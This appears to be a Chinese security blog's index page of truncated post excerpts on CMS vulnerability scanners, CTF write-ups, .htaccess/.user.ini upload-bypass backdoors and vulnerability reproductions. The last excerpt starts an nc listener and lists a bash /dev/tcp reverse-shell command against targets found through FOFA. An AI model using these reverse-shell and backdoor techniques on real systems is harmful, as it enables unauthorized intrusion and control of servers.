摘要:
工具简介FrameScan-GUI是一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架,是FrameScan的加强版。支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨... 阅读全文
摘要:
打开题目F12看到一个被注释的跳转。 访问可以知道是一个文件包含经过测试,该文件禁止了input、data关键字。并禁止了phar://协议。使用php://filter读取题目源码得到http://47.94.... 阅读全文
摘要:
题目链接:http://47.94.221.39:8008/扫描目录得到/.DS_Store文件 下载文件,直接用脚本进行还原操作。 https://github.com/lijiejie/ds_store_ex... 阅读全文
摘要:
工具简介GithubL:https://github.com/qianxiao996/FrameScanFrameScan是一款python3编写的简易的cms漏洞检测框架,支持多种检测方式,支持大多数CMS,可... 阅读全文
摘要:
1、.htaccess文件2、文件上传绕过一般.htaccess可以用来留后门和针对黑名单绕过创建一个txt写入(png解析为php)AddType application/x-httpd-php .png另存为... 阅读全文
摘要:
.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的IIS php... 阅读全文
摘要:
0x00 影响范围v4.2.1-v4.2.1290x01 环境搭建1. 先去官网下载 骑士人才系统基础版(安装包)2.将下载好的包进行安装 0x02 复现过程当前版本v4.2.111 点加工具,点击风格模板 Pa... 阅读全文
摘要:
圈子某位大佬公布的0day,拿来刷一刷,漏洞分析请移步大佬文章。大佬链接0x01 环境准备1、首先去码云下载最新版本的discuz(DiscuzX 3.4 R20191201)。 2、将upaod放置到网站目录下... 阅读全文
摘要:
CTF-Tools一款CTF编码、解码、加密、解密工具。支持的编码解码:URL-UTF-8 URL-GB2312 Unicode Escape(%U) HtmlEncode ACSII Base16 Base32... 阅读全文
摘要:
1、寻找目标首先FOFA找一个环境,检测工具检测一下发现目标,开干!2、开启监听首先在vps运行nc 监听一个端口nc -lvp 666列出需要使用的反弹指令bash -i >& /dev/tcp/129.204... 阅读全文